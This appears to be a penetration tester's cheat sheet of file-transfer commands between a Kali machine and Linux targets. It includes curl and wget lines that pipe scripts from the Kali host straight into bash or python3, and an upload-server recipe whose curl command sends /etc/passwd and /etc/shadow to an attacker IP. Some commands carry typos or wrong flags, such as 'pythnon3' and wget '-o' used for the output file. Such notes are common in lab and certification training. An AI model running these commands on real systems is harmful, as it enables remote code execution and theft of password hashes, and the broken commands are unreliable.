This is from kali to linux and vice versa, since both are LINUX devices :) 

Option 1) We can use base64 to transfer the file, use this for smaller files    
    Step 1) # cat <File> |base64 -w 0;echo :- Machine where the file is present
          We get the base 64 hash, copy it 
    Step 2) Now can save it in the target machine
          # echo -n '<base 64 echo>' | base64 -d > <Output file name>


Option 2) Run http server on Linux and run the below command from system where we need file to be. 
        # wget https://<http://Linux IP address:Port/File> -O /tmp/<File name>
        # curl -o /tmp/<Output file name> https://<Linux IP Adderss:Port/File name>

=======================================================================================================================================================================================

We can also run the files directly without downloading the file 

Option 1) We can use curl 
        curl https://<Kali IP Address:Port>/Shell-File.sh | bash
        curl https://<Kali IP Address:Port>/Python-File.py | python3 

Option 2) We can use wget to acheive the same 
        wget -qO- https://<Kali IP Address:Port>/Python-File.py | python3 


=======================================================================================================================================================================================


We can also use upload server for transfering the files 

Step 1) openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' :- Run this in the Root 
Step 2) sudo python3 -m uploadserver 443 --server-certificate ~/server.pem :- Start the upload server 
Step 3) We can run the below command in the server from where the files has to be transfered. 
        curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure {# we can send multiple files}


=======================================================================================================================================================================================


NOW THIS IS THE BEST WAY TO TRANSFER THE FILE 

Option 1) When we have Python3 
    pythnon3 -m http.server 80 :- On the server from where the file has to transfered
    wget http://<IP:Port/File name> -o <Output file path with name>


Option 2) If the server doesn't have PYHTON3 
    python2.7 -m SimpleHTTPServer 80
    wget http://<IP:Port/File name> -o <Output file path with name>

Option 3) If we don't have PYTHON, we can run Ruby server to transfer the file 
    ruby -run -ehttpd . -p80
    wget http://<IP:Port/File name> -o <Output file path with name>

 
